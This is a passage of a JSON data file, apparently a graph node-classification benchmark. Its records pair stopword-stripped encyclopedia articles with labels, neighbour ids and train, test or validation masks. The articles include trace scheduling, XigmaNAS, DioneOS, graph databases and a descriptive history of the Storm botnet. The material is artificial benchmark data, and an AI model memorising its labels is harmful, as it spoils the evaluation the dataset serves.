    "mask": "Test"
  },
  {
    "node_id": 9622,
    "label": 9,
    "text": "Trace_scheduling:trace scheduling trace scheduling optimization technique developed josh fisher used compilers computer programs compiler often rearranging generated machine instructions faster execution improve program performance increases ilp instruction level parallelism along important execution path statically predicting frequent execution path trace scheduling one many known techniques trace sequence instructions including branches including loops executed input data trace scheduling uses basic block scheduling method schedule instructions entire trace beginning trace highest frequency adds compensation code entry exit trace compensate effects order execution may result large increases code sizes poor erratic performance program behavior varies significantly input trace scheduling originally developed long instruction word vliw machines form global code motion works converting loop long straight-line code sequence using loop unrolling static branch prediction process separates unlikely code adds handlers exits trace goal common case executed sequential set instructions without branches",
    "neighbors": [
      8262,
      6818,
      2620,
      5948
    ],
    "mask": "Test"
  },
  {
    "node_id": 9623,
    "label": 9,
    "text": "Unreferenced_variable:unreferenced variable unreferenced variable source code computer program variable defined never used may result harmless waste memory many compilers detect variables allocate storage i.e. optimize away storage generally also issuing warning coding guideline documents consider unreferenced variable symptom potential coding fault hand unreferenced variables used temporary placeholders indicate expected future developments code c example j unreferenced variable",
    "neighbors": [
      1952,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9624,
    "label": 4,
    "text": "Corporate_Emergency_Access_System:corporate emergency access system corporate emergency access system ceas credentialing program united states company critical employees event disaster serious emergency employees show ceas id cards first responders admitted business location ceas helps businesses mitigate damage loss resulting allowing rapid access restricted areas ceas helps businesses mitigate damage loss allowing critical employees rapid access restricted areas allows rapidly recover essential operations retrieve assets securities valuables vital records computer hardware critical equipment core systems also conduct damage assessments ceas developed new york state 1990s business network emergency resources not-for-profit organization pioneered emergency-identification-card-based capability ceas access system adopted boston cambridge massachusetts chester county philadelphia pennsylvania erie nassau suffolk counties new york new york city baltimore stamford connecticut order businesses enroll ceas local municipalities must adopt ceas program receive id cards local authorities implement ceas following emergency immediate threats life stabilized participating businesses select pre-determined number employees receive ceas access id cards based total employee population",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9625,
    "label": 2,
    "text": "XigmaNAS:xigmanas xigmanas network-attached storage nas server software dedicated management web interface written php free software terms simplified bsd license xigmanas continuation original freenas code developed 2005 late 2011 released name nas4free 22 march 2012 name changed xigmanas july 2018 sourceforge elected “ 'community choice project month ” twice august 2015 march 2017 respectively xigmanas embedded open-source nas software distribution based latest release freebsd developed original freenas 7 code updated work current latest freebsd releases however xigmanas preserves freenas ’ original m0n0wall/php architecture introduces experimental support arm architecture xigmanas supports sharing across windows apple unix-like systems includes zfs v5000 software raid 0,1,5 disk encryption s.m.a.r.t email reports etc. following protocols smb samba active directory domain controller ad ftp nfs tftp afp rsync unison file synchronizer iscsi initiator target hast carp bridge upnp bittorrent configurable web interface xigmanas installable almost boot media including livecd optionally small usb flash drive config storage necessary x86-64 x86-32 computer platforms version 10.3 version 11.0 xigmanas longer supports x86-32 version 10.3 still getting updates xigmanas installed compact flash usb flash drive ssd hard drive bootable devices supports advanced formatted drives using 4 kb sectors booted livecd liveusb software distribution currently distributed iso image .iso ~370 mb usb flash drive image .img ~320 mb format source form special small footprint embedded image also available .img ~150 mb preferred method embedded installation onto usb stick compact flash card cf hard disk hdd/ssd xigmanas designed xigmanas os load system memory eliminating system writes drive flash devices energy efficient updating process done webgui browser downloading installing new firmware image original freenas project derives m0n0wall freenas 0.7 branch end-of-life 'd late 2011 freenas name legally acquired ixsystems inc starting version 8.x new ixsystems developers rewrote freenas legacy freenas 0.7 longer available download legacy freenas 0.7 code unable developed longer name name change necessary founder freenas olivier cochard-labbé donated original freenas source code nas4free project support former developers namely daisuke aoyama michael zoon carries original freenas code base freenas 8.x.y software fork original freenas new rewritten code-base continuing old branded name 2018 project applied xigmanas trademark order protect brand prior release v11.2",
    "neighbors": [
      6153,
      10761,
      4636,
      1071,
      9784,
      5177,
      8266,
      5710,
      7249,
      9306,
      1118,
      607,
      9320,
      3181,
      8816,
      7794,
      9844,
      9343,
      6273,
      2180,
      2193,
      2197,
      2199,
      2212,
      684,
      3248,
      1718,
      7863,
      5819,
      11459,
      708,
      7364,
      9927,
      8395,
      8909,
      6864,
      8404,
      10455,
      6361,
      8410,
      5356,
      9452,
      11506,
      1273,
      7425,
      5380,
      1801,
      274,
      6438,
      10535,
      4908,
      7983,
      9009,
      11573,
      850,
      6491,
      7521,
      1891,
      3428,
      5482,
      7027,
      2421,
      2424,
      7552,
      1927,
      7049,
      1946,
      9119,
      929,
      11698,
      1465,
      3006,
      8644,
      10202,
      3551,
      998,
      4073,
      2545,
      3058,
      499,
      9201
    ],
    "mask": "Test"
  },
  {
    "node_id": 9626,
    "label": 9,
    "text": "Second-generation_programming_language:second-generation programming language second-generation programming language 2gl generational way categorize assembly languages term coined provide distinction higher level machine independent third-generation programming languages 3gl cobol earlier first-generation programming languages machine code second-generation programming languages following properties second-generation languages sometimes used parts kernels device drivers sometimes used video games graphics programs intensive programs modern programs second generation assembly languages rarely used second generation languages may advantages mainly speed programming low level assembly language downsides downsides requirements programmers lead decline assembly vast majority programs written third-generation programming language fourth-generation programming language assembly main advantage speed degraded fact well written c code often fast even faster hand written assembly second generation languages perhaps significant place computing history long time second generation assembly languages good option development many machines nes commodore 64 second generation languages represented massive step away tradition programmers conforming needs machine first step towards machine accommodating programmer phenomenon would repeated subsequent programming language generations",
    "neighbors": [
      9345,
      2691,
      9224,
      5651,
      5527,
      3613,
      4770,
      5680,
      305,
      2045,
      9780,
      1591,
      4410,
      191,
      10819,
      8262,
      9926,
      4042,
      5845,
      477,
      7395,
      4838,
      9330,
      9331,
      2556,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9627,
    "label": 3,
    "text": "Shanghai_(video_game):shanghai video game shanghai computerized version mahjong solitaire published activision 1986 amiga atari st atari 8-bit family commodore 64 ibm pc macintosh apple iigs master system shanghai originally programmed brodie lockard winning game tiles reveal three-dimensional blinking eye dragon behind game screen macintosh master system versions show animated dragon spitting fire shanghai sold 500,000 copies 1991 computer gaming world december 1986 published varying opinions gregg williams stated could n't believe activision wasted resources putting charles ardai called probably best game year info gave amiga version four-plus stars five stating program ought illegal impossible play 'just one game describing gameplay swift deceptively simple magazine warned plan spending lot time one gave commodore 64 version three-plus stars five describing shanghai fanatically addictive criticizing user interface graphics magazine concluded 'll find hard quit compute reviewed game favorably reporting shanghai mania proportions beginning fear health 1988 dragon gave game 5 5 stars 1996 computer gaming world declared shanghai 146th-best computer game ever released dragon magazine also gave atari lynx version 5 stars may 1992 issue robert jung ign gave game score 10 10 review cvg magazine reviewed game march 1991 issue giving score 84 100 sequel shanghai ii dragon eye published 1990 ms-dos ports released macintosh fm towns msx pc-98 sharp x68000 windows sega genesis super nes genesis version re-released wii virtual console pal regions november 27 2009 north america january 11 2010 later delisted end 2013",
    "neighbors": [
      8484,
      2984,
      9006,
      9166,
      4856,
      6129,
      9951,
      4152,
      95
    ],
    "mask": "Train"
  },
  {
    "node_id": 9628,
    "label": 2,
    "text": "DioneOS:dioneos dioneos pronounced /djoneos/ multitasking preemptive real-time operating system system designed texas instruments msp430x microcontrollers target microcontroller platform limited resources i.e system clock frequency tens mhz memories amount tens hundreds kb system adapted conditions providing compact efficient image efficiency term means minimization additional cpu load caused system usage according definition system effective consumes less cpu time execution internal parts e.g threads management dioneos system intended autonomic devices user interface limited functions core functionality provided system environment building multitasking firmware means standard well known concepts e.g semaphores timers etc. target domain application system graphic user interface texas instruments company manufactures wide range microcontrollers use msp430 core depending version chip contains different amount flash memory ram e.g msp430f2201 1kb/128b correspondingly msp430f5438 256kb/16kb size memory exceeds 64 kb limit 16 bits addressing insufficient due constraint chips larger memory equipped extended core msp430x version processor wider registers 20 bits new instructions processing compilation programmer selects type memory model 'near 'far used flash ram memories choice determines accessible memory range hence flash 64 kb limit programmed 'far model must used dioneos supports 'far model code modules large firmware uses extended flash developed run system control system uses 'near memory model data segments firmware started dioneos system consists threads executed pseudo-parallel way thread unique priority used ordering threads important least one thread priority value defines precedence running others dioneos system thread one following states one core processor one thread running state thread highest priority threads waiting state change thread state caused system handles 16 threads including idle one lowest priority idle thread always ready run never switched 'waiting state permitted call functions would block inside thread idle thread used determine total system load dioneos system provides stated 'threads management chapter firmware consists pseudo-parallel threads thread context contains core registers processor last execution address private stack switch threads system saves context stopped thread recovers context one run state saving makes possible breaking thread execution continuation even thread executed note preemption followed context switch may happen moment even system function called thread although may happen unexpected location executed code thread work distorted due system context saving thread point view switch done background context switch critical operation system time execution determines effective system context switch dioneos system optimized short time important parts written assembler switch done 12–17 μs f=25 mhz dioneos system context switch initiated interrupt service routine property useful moving event handling thread commonly implemented two-layer architecture context switch measured signaling point isr thread recovery takes 10us f=25 mhz dioneos system dioneos multiple configuration options affects features inserted compiled image system lot source code switches gathered configuration file altered developer firmware means possible control additional testing parts enabled system built version provides detection unusual conditions run-time information helps debugging process errors found eliminated extra features disabled full performance system example fragment configuration file",
    "neighbors": [
      10883,
      6276,
      9366,
      7319,
      2201,
      10030,
      4668,
      6207,
      5823,
      321,
      10561,
      1221,
      9927,
      6985,
      9162,
      2383,
      341,
      3197,
      477,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      1776,
      10482,
      2804,
      11383,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9629,
    "label": 8,
    "text": "Service_choreography:service choreography service choreography form service composition interaction protocol several partner services defined global perspective idea underlying notion service choreography summarised follows dancers dance following global scenario without single point control run-time participant service choreography executes part according behavior participants choreography role specifies expected messaging behavior participants play terms sequencing timing messages consume produce choreography describes sequence conditions data exchanged two participants order meet useful purpose service choreography better understood comparison another paradigm service composition service orchestration one hand service choreographies logic message-based interactions among participants specified global perspective service orchestration hand logic specified local point view one single participant called orchestrator service orchestration language bpel example specification service orchestration e.g bpel process file workflow deployed service infrastructure example bpel execution engine like apache ode deployment service orchestration specification transforms workflow composite service sense service choreography orchestrations two flips coin one hand roles service choreography extracted service orchestrations process called projection projection possible realize skeletons i.e incomplete service orchestrations used baselines realize web services participate service choreography hand already existing service orchestrations may composed service choreographies service choreographies executed enacted service choreography enacted participants execute roles unlike service orchestration service choreographies run engine service infrastructure “ happen roles executed logic service choreography specified global point view thus realized one single service like service orchestration key question much research choreography seeks answer suppose global choreography constructed describes possible interactions participants collaboration conditions choreography need obey guaranteed collaboration succeeds succeeds means emergent behaviour results collaboration enacted participant acting independently according skeleton exactly follows choreography skeletons originally projected case choreography said realizable general determining realizability choreography non-trivial question particularly collaboration uses asynchronous messaging possible different participants send messages simultaneously ambit specifications concerning web services following specifications focused defining languages model service choreographies moreover omg specification bpmn version 2.0 includes diagrams model service choreographies academic proposals service choreography languages include moreover number service choreography formalisms proposed based web service choreography ws-choreography specification w3c defining xml-based business process modeling language describes collaboration protocols cooperating web service participants services act peers interactions may long-lived stateful orchestration another term similar still different meaning main effort get choreography w3c web services choreography working group closed 10 july 2009 leaving ws-cdl candidate recommendation many presentations w3c workshop web services 11–12 april 2001 pointed need common interface composition language help address choreography web services architecture requirements working draft created web services architecture working group also lists idea web service choreography capabilities critical success factor support several different top-level goals nascent web services architecture problem choreography great interest industry time efforts wscl web service conversation language wsci web service choreography interface submitted w3c published technical notes moreover complementary efforts launched june 2002 intalio sun bea sap released joint specification named web services choreography interface wsci specification also submitted w3c note august 2002 w3c since formed new working group called web services choreography working group within web services activity wsci specification one primary inputs web services choreography working group published candidate recommendation ws-cdl version 1.0 november 9th 2005 xlang wsfl wsci longer supported standard organization companies bpel replaced xlang wsfl wsci superseded ws-cdl upcoming business process modeling notation version 2.0 introduce diagrams specifying service choreographies academic field put forward service choreography languages example let dance bpel4chor map service choreographies specify message-based interactions among participants global perspective way programming languages grouped programming paradigms service choreography languages grouped styles several active research projects topic service choreography",
    "neighbors": [
      9665,
      2501,
      4107,
      2418,
      6007,
      5210,
      3323,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9630,
    "label": 4,
    "text": "Storm_botnet:storm botnet storm botnet storm worm botnet also known dorf botnet ecard malware remotely controlled network zombie computers botnet linked storm worm trojan horse spread e-mail spam height september 2007 storm botnet running anywhere 1 million 50 million computer systems accounted 8 malware microsoft windows computers first identified around january 2007 distributed email subjects 230 dead storm batters europe giving well-known name botnet began decline late 2007 mid-2008 reduced infecting 85,000 computers far less infected year earlier december 2012 original creators storm still n't found storm botnet displayed defensive behaviors indicated controllers actively protecting botnet attempts tracking disabling specifically attacking online operations security vendors researchers attempted investigate security expert joe stewart revealed late 2007 operators botnet began decentralize operations possible plans sell portions storm botnet operators reportedly powerful enough force entire countries internet estimated capable executing instructions per second world top supercomputers united states federal bureau investigation considered botnet major risk increased bank fraud identity theft cybercrimes first detected internet january 2007 storm botnet worm so-called storm-related subject lines infectious e-mail employed initially 230 dead storm batters europe later provocative subjects included chinese missile shot usa aircraft u.s. secretary state condoleezza rice kicked german chancellor angela merkel suspected information security professionals well-known fugitive spammers including leo kuvayev may involved operation control storm botnet according technology journalist daniel tynan writing robert x. cringely pseudonym great portion fault existence storm botnet lay microsoft adobe systems sources state storm worm primary method victim acquisition enticing users via frequently changing social engineering confidence trickery schemes according patrick runald storm botnet strong american focus likely agents working support within united states experts however believe storm botnet controllers russian pointing specifically russian business network citing storm software mentions hatred moscow-based security firm kaspersky lab includes russian word buldozhka means bulldog botnet zombie network comprises computers running microsoft windows operating system infected computer becomes known bot bot performs automated tasks—anything gathering data user attacking web sites forwarding infected e-mail—without owner knowledge permission estimates indicate 5,000 6,000 computers dedicated propagating spread worm use e-mails infected attachments 1.2 billion virus messages sent botnet september 2007 including record 57 million august 22 2007 alone lawrence baldwin computer forensics specialist quoted saying cumulatively storm sending billions messages day could double digits billions easily one methods used entice victims infection-hosting web sites offers free music artists beyoncé knowles kelly clarkson rihanna eagles foo fighters r. kelly velvet revolver signature-based detection main defense computer systems virus malware infections hampered large number storm variants back-end servers control spread botnet storm worm automatically re-encode distributed infection software twice hour new transmissions making difficult anti-virus vendors stop virus infection spread additionally location remote servers control botnet hidden behind constantly changing dns technique called ‘ fast flux ’ making difficult find stop virus hosting sites mail servers short name location machines frequently changed rotated often minute minute basis storm botnet operators control system via peer-to-peer techniques making external monitoring disabling system difficult central command-and-control point storm botnet shut botnet also makes use encrypted traffic efforts infect computers usually revolve around convincing people download e-mail attachments contain virus subtle manipulation one instance botnet controllers took advantage national football league opening weekend sending mail offering football tracking programs nothing infect user computer according matt sergeant chief anti-spam technologist messagelabs terms power botnet utterly blows supercomputers away add 500 top supercomputers blows away 2 million machines frightening criminals access much computing power much estimated 10 -20 total capacity power storm botnet currently used computer security expert joe stewart detailed process compromised machines join botnet attempts join botnet made launching series exe files said machine stages usually named sequence game0.exe game5.exe similar continue launching executables turn typically perform following stage compromised system connect botnet fast flux dns makes tracking process exceptionally difficult code run windir \\system32\\wincom32.sys windows system via kernel rootkit connections back botnet sent modified version edonkey/overnet communications protocol storm botnet variants employ variety attack vectors variety defensive steps exist well storm botnet observed defending attacking computer systems scanned storm virus-infected computer systems online botnet defend ddos counter-attacks maintain internal integrity certain points time storm worm used spread botnet attempted release hundreds thousands versions onto internet concentrated attempt overwhelm defenses anti-virus malware security firms according joshua corman ibm security researcher first time remember ever seeing researchers actually afraid investigating exploit researchers still unsure botnet defenses counterattacks form automation manually executed system operators try attach debugger query sites reporting knows punishes instantaneously secureworks chunk ddos-ed distributed-denial-of-service attacked researcher network every time hear investigator trying investigate 're automatically punished knows investigated punishes fights back corman said spameater.com well sites 419eater.com artists 419 deal 419 spam e-mail fraud experienced ddos attacks temporarily rendering completely inoperable ddos attacks consist making massed parallel network calls target ip addresses overloading servers capacities preventing responding requests anti-spam anti-fraud groups spamhaus project also attacked webmaster artists 419 said website server succumbed attack increased 100mbit similar attacks perpetrated dozen anti-fraud site hosts jeff chan spam researcher stated terms mitigating storm challenging best impossible worst since bad guys control many hundreds megabits traffic evidence may control hundreds gigabits traffic enough force countries internet storm botnet systems also take steps defend locally victims computer systems botnet compromised systems creates computer process windows machine notifies storm systems whenever new program processes begin previously storm worms locally would tell programs—such anti-virus anti-malware software simply run however according ibm security research versions storm also simply fool local computer system run hostile program successfully fact anything programs including av exes dlls sys files also software p2p applications bearshare edonkey appear run successfully even though n't actually anything far less suspicious process gets terminated suddenly outside said richard cohen sophos compromised users related security systems assume security software running successfully fact september 17 2007 republican party website united states compromised used propagate storm worm botnet october 2007 botnet took advantage flaws youtube captcha application mail systems send targeted spam e-mails xbox owners scam involving winning special version video game halo 3 attack methods include using appealing animated images laughing cats get people click trojan software download tricking users yahoo geocities service download software claimed needed use geocities geocities attack particular called full-fledged attack vector paul ferguson trend micro implicated members russian business network well-known spam malware service christmas eve 2007 storm botnet began sending holiday-themed messages revolving around male interest women titles find christmas tail twelve girls christmas mrs. claus tonight photos attractive women described attempt draw unprotected systems botnet boost size holidays security updates protection vendors may take longer distributed day e-mails christmas strippers distributed storm botnet operators immediately began sending new infected e-mails claimed wish recipients happy new year 2008 january 2008 botnet detected first time involved phishing attacks major financial institutions targeting barclays halifax around october 15 2007 uncovered portions storm botnet variants could sale done using unique security keys encryption botnet internet traffic information unique keys allow segment sub-section storm botnet communicate section matching security key however may also allow people detect track block storm botnet traffic future security keys unique lengths signatures computer security vendor sophos agreed assessment partitioning storm botnet indicated likely resale services graham cluley sophos said storm use encrypted traffic interesting feature raised eyebrows lab likely use cybercriminals lease portions network misuse would n't surprise network used spamming distributed denial-of-service attacks malicious activities security experts reported storm broken malware market form ready-to-use botnet-making spam kit world could see sharp rise number storm related infections compromised computer systems encryption seems affect systems compromised storm second week october 2007 onwards meaning computer systems compromised time frame remain difficult track block within days discovery segmenting storm botnet spam e-mail new subsection uncovered major security vendors evening october 17 security vendors began seeing new spam embedded mp3 sound files attempted trick victims investing penny stock part illegal pump-and-dump stock scam believed first-ever spam e-mail scam made use audio fool victims unlike nearly storm-related e-mails however new audio stock scam messages include sort virus storm malware payload simply part stock scam january 2008 botnet detected first time involved phishing attacks customers major financial institutions targeting banking establishments europe including barclays halifax royal bank scotland unique security keys used indicated f-secure segments botnet leased september 25 2007 estimated microsoft update windows malicious software removal tool msrt may helped reduce size botnet 20 new patch claimed microsoft removed storm approximately 274,372 infected systems 2.6 million scanned windows systems however according senior security staff microsoft 180,000+ additional machines cleaned msrt since first day likely home user machines notably incorporated daily operation 'storm botnet indicating msrt cleaning may symbolic best late october 2007 reports indicated storm botnet losing size internet footprint significantly reduced size brandon enright university california san diego security analyst estimated botnet late october fallen size approximately 160,000 compromised systems enright previous estimated high july 2007 1,500,000 systems enright noted however botnet composition constantly changing still actively defending attacks observation 're researcher hit pages hosting malware much… automated process automatically launches denial service attack said added research caused storm botnet attack knocked part uc san diego network offline computer security company mcafee reported saying storm worm would basis future attacks craig schmugar noted security expert discovered mydoom worm called storm botnet trend-setter led usage similar tactics criminals one derivative botnet dubbed celebrity spam gang due use similar technical tools storm botnet controllers unlike sophisticated social engineering storm operators use entice victims however celebrity spammers make use offers nude images celebrities angelina jolie britney spears cisco systems security experts stated report believe storm botnet would remain critical threat 2008 said estimated size remained millions early 2008 storm botnet also found business competition black hat economy form nugache another similar botnet first identified 2006 reports indicated price war may underway operators botnets sale spam e-mail delivery following christmas new year holidays bridging 2007-2008 researchers german honeynet project reported storm botnet may increased size 20 holidays messagelabs intelligence report dated march 2008 estimates 20 spam internet originates storm storm botnet sending spam two years decline late 2008 one factor — account making less interesting creators maintain botnet — may stormfucker tool made possible take control parts botnet april 28 2010 mcafee made announcement so-called rumors stormbot 2 verified mark schloesser tillmann werner felix leder german researchers lot work analyzing original storm found around two-thirds new functions copy paste last storm code base thing missing p2p infrastructure perhaps tool used p2p bring original storm honeynet blog dubbed stormbot 2",
    "neighbors": [
      3072,
      7809,
      10756,
      11146,
      3724,
      3852,
      6797,
      3347,
      4883,
      2325,
      278,
      9087,
      5373,
      3867,
      8735,
      10657,
      6520,
      4648,
      9256,
      939,
      3629,
      46,
      7983,
      6834,
      10875,
      1337,
      10297,
      1979,
      3643,
      7739,
      7996,
      9791,
      704,
      8640,
      9154,
      9537,
      9664,
      8133,
      11583,
      1480,
      10952,
      2508,
      81,
      4945,
      8789,
      3030,
      8664,
      10457,
      7515,
      988,
      3807,
      5087,
      8032,
      9055,
      2147,
      3941,
      1254,
      9319,
      107,
      8045,
      4462,
      10477,
      3704,
      2041,
      3323,
      3581,
      5886,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 9631,
    "label": 1,
    "text": "Graph_database:graph database computing graph database gdb database uses graph structures semantic queries nodes edges properties represent store data key concept system graph edge relationship graph relates data items store collection nodes edges edges representing relationships nodes relationships allow data store linked together directly many cases retrieved one operation graph databases hold relationships data priority querying relationships within graph database fast perpetually stored within database relationships intuitively visualized using graph databases making useful heavily inter-connected data graph databases part nosql databases created address limitations existing relational databases graph model explicitly lays dependencies nodes data relational model nosql database models link data implicit connections graph databases design allow simple fast retrieval complex hierarchical structures difficult model relational systems graph databases similar 1970s network model databases represent general graphs network-model databases operate lower level abstraction lack easy traversal chain edges underlying storage mechanism graph databases vary depend relational engine “ store ” graph data table although table logical element therefore approach imposes another level abstraction graph database graph database management system physical devices data actually stored others use key-value store document-oriented database storage making inherently nosql structures graph databases based non-relational storage engines also add concept tags properties essentially relationships pointer another document allows data elements categorized easy retrieval en masse retrieving data graph database requires query language sql designed manipulation data relational system therefore “ elegantly ” handle traversing graph single graph query language universally adopted way sql relational databases wide variety systems often tightly tied one product standardization efforts occurred leading multi-vendor query languages like gremlin sparql cypher addition query language interfaces graph databases accessed application programming interfaces apis graph databases differ graph compute engines graph databases technologies translations relational oltp databases hand graph compute engines utilized olap bulk analysis graph databases attracted considerable attention 2000s due successes major technology corporations using proprietary graph databases introduction open-source graph databases graph databases portray data viewed conceptually accomplished transferring data nodes relationships edges graph within graph databases based graph theory set objects either node edge labeled-property graph model represented set nodes relationships properties labels nodes data relationships named store properties represented key/value pairs nodes labelled grouped edges representing relationships two qualities always start node end node directed making graph directed graph relationships also properties useful providing additional metadata semantics relationships nodes direct storage relationships allows constant-time traversal popular form graph model 2018 model popular graph database october 2018 neo4j rdf graph model addition information represented separate node example imagine scenario user add name property person represented distinct node graph labeled-property graph model would done addition name property node person however rdf user add separate node called 'hasname connecting original person node specifically rdf graph model composed nodes arcs rdf graph notation statement represented node subject node object arc predicate node may left blank literal and/or identified uriref arc may also identified uriref literal node may two types plain untyped typed plain literal lexical form optionally language tag typed literal made string uriref identifies particular datatype blank node may used accurately illustrate state data data uri used open graph protocol used facebook allow web page functionality object facebook semantic web multiple types graphs categorized gartner suggests five broad categories graphs execution queries within graph database localized portion graph search irrelevant data making advantageous real-time big data analytical queries consequently graph database performance proportional size data needed traversed staying relatively constant despite growth data stored graph databases powerful tool graph-like queries example computing shortest path two nodes graph graph-like queries performed graph database natural way example graph diameter computations community detection graphs flexible meaning allows user insert new data existing graph without loss application functionality need designer database plan extensive details databases future use-cases underlying storage mechanism graph databases vary depend relational engine “ store ” graph data table although table logical element therefore approach imposes another level abstraction graph database graph database management system physical devices data actually stored others use key-value store document-oriented database storage making inherently nosql structures one nosql database utilizes method arangodb arangodb native multi-model database supports graphs one data models stores graphs holding edges nodes separate collections documents node would represented document store edges link two different nodes hold special attributes inside document _from _to attributes data lookup performance dependent access speed one particular node another index-free adjacency enforces nodes direct physical ram addresses physically point adjacent nodes results fast retrieval native graph system index-free adjacency move type data structures find links nodes directly-related nodes graph stored cache one nodes retrieved making data look-up even faster first time user fetches node however advantage comes cost index-free adjacency sacrifices efficiency queries use graph traversals native graph databases use index-free adjacency process crud operations stored data since edgar f. codd 1980 paper relational model relational databases de facto industry standard large-scale data storage systems however relational model requirement strict schema data normalization imposed limitations relationships queried increasing amount data needing processed became additional problem posed relational model traditionally databases designed relational model relational model data normalized support acid transactions data normalization process removes duplicate data within database goal data normalization preserve data consistency relational model enforces acid transactions separating data many tables relational models enforce heavy data normalization order guarantee consistency one relational model design motivation achieve fast row-by-row access problems arise need form complex relationships stored data although relationships analyzed relational model complex queries performing many join operations many different attributes several tables required working relational models foreign key constraints also considered retrieving relationships causing additional overhead compared relational databases graph databases often faster associative data sets map directly structure object-oriented applications scale naturally large data sets typically need costly join operations costly means executed databases non-optimal designs logical physical levels depend less rigid schema marketed suitable manage ad hoc changing data evolving schemas conversely relational database management systems typically faster performing operation large numbers data elements permitting manipulation data natural structure despite graph databases advantages recent popularity relational databases recommended graph model sole reason replace already placed well-designed relational database benefit utilizing graph database becomes relevant evidence performance improvement orders magnitude lower latency relational model gathers data together using information data example one might look users whose phone number contains area code 311 would done searching selected datastores tables looking selected phone number fields string 311 time consuming process large tables relational databases offer concept database index allows data like stored smaller subtable containing selected data unique key primary key record part phone numbers indexed search would occur smaller index table gathering keys matching records looking main data table records keys generally tables physically stored look-ups keys fast relational databases inherently contain idea fixed relationships records instead related data linked storing one record unique key another record data example table containing email addresses users might hold data item called codice_1 contains primary key user record associated order link users email addresses system first looks selected user records primary keys looks keys codice_1 column email table likely index extracts email data links user email records make composite records containing selected data operation termed join computationally costly depending complexity query number joins indexing various keys system may search multiple tables indexes gather lots information sort match together contrast graph databases directly store relationships records instead email address found looking user key codice_1 column user record contains pointer directly refers email address record selected user pointer followed directly email records need search email table find matching records eliminate costly join operations example one searches email addresses users area code 311 engine would first perform conventional search find users 311 retrieve email addresses following links found records relational database would first find users 311 extract list pk perform another search records email table pk link matching records together types common operations graph database theory least significantly faster true value graph approach becomes evident one performs searches one level deep example consider search users subscribers table linking users users 311 area code case relational database first search users area code 311 search subscribers table users finally search users table retrieve matching users contrast graph database would search users 311 follow back-links subscriber relationship find subscriber users avoids several searches look-ups memory usage involved holding temporary data multiple records needed construct output technically sort look-up completed log n 1 time time proportional logarithm size data contrast relational version would multiple log n look-ups plus time needed join data records relative advantage graph retrieval grows complexity query example one might want know movie submarines actor movie actor played lead gone wind first requires system find actors gone wind find movies find actors movies lead gone wind find movies finally filtering list descriptions containing submarine relational database require several separate searches movies actors tables another search submarine movies finding actors movies comparing large collected results contrast graph database would simply walk gone wind clark gable gather links movies gather links movies actors follow links actors back list movies resulting list movies searched submarine done via one search properties add another layer abstraction structure also improves many common queries properties essentially labels applied record cases edges well example one might label clark gable actor would allow system quickly find records actors opposed director camera operator labels edges allowed one could also label relationship gone wind clark gable lead performing search people lead actor movie gone wind database would produce vivien leigh olivia de havilland clark gable equivalent sql query would rely added data table linking people movies adding complexity query syntax sorts labels may improve search performance certain circumstances generally useful providing added semantic data end users relational databases well suited flat data layouts relationships data one two levels deep example accounting database might need look line items invoices given customer three-join query graph databases aimed datasets contain many links especially well suited social networking systems friends relationship essentially unbounded properties make graph databases naturally suited types searches increasingly common online systems big data environments reason graph databases becoming popular large online systems like facebook google twitter similar systems deep links records illustrate imagine relational model two different tables people friend people table contains two columns person_id person_name similarly friend tables two columns well person_id friend_id person_id foreign key people table case searching jack friends would result following sql query select p2.person_name people p1 join friend p1.person_id == friend.person_id join people p2 p2.person_id == friend.friend_id p1.person_name 'jack query may translated -- match ee person friend-with friend ee.name jack return ee friend prefix foaf http //xmlns.com/foaf/0.1/ select name foaf person prefix foaf http //xmlns.com/foaf/0.1/ select name foaf name jack select people.name examples simple illustration basic relationship query condense idea relational models query complexity increases total amount data comparison graph database query easily able sort relationship graph present results also results indicate simple condensed declarative queries graph databases necessarily provide good performance comparison relational databases graph databases offer intuitive representation data relational databases offer better results set operations needed pre-history graph databases mid-1960s navigational databases ibm ims supported tree-like structures hierarchical model strict tree structure could circumvented virtual records graph structures could represented network model databases late 1960s codasyl defined cobol 1959 defined network database language 1969 labeled graphs could represented graph databases mid-1980s logical data model several improvements graph databases appeared early 1990s accelerating late 1990s endeavors index web pages mid-late 2000s commercial atomicity consistency isolation durability acid graph databases neo4j oracle spatial graph became available 2010s commercial acid graph databases could scaled horizontally became available sap hana brought in-memory columnar technologies graph databases also 2010s multi-model databases supported graph models models relational database document-oriented database became available orientdb arangodb marklogic starting 7.0 version time graph databases various types become especially popular social network analysis advent social media companies following list graph databases",
    "neighbors": [
      5632,
      8201,
      2062,
      6161,
      2068,
      5658,
      9245,
      9248,
      10793,
      5677,
      10286,
      1594,
      4155,
      11324,
      8262,
      9286,
      2632,
      9290,
      8269,
      7248,
      8788,
      10326,
      7767,
      8291,
      9828,
      10340,
      8808,
      8810,
      2669,
      3705,
      7802,
      1146,
      3196,
      2688,
      7816,
      3219,
      10389,
      151,
      4255,
      1697,
      4263,
      10413,
      9397,
      7868,
      11457,
      6850,
      2246,
      5833,
      10452,
      8408,
      2780,
      734,
      10470,
      10471,
      6383,
      7412,
      6395,
      3323,
      8451,
      1296,
      11024,
      8979,
      7446,
      11030,
      1306,
      5403,
      2339,
      10020,
      2344,
      6458,
      1341,
      10048,
      2369,
      5953,
      6470,
      10059,
      2901,
      10069,
      11098,
      8554,
      9075,
      4476,
      3454,
      3462,
      10632,
      2456,
      9112,
      10137,
      1435,
      9634,
      1447,
      7080,
      4011,
      5047,
      9147,
      3004,
      8644,
      6085,
      5577,
      2512,
      987,
      4065,
      7650,
      6629,
      6124,
      2544,
      10737,
      3573,
      4604,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9632,
    "label": 7,
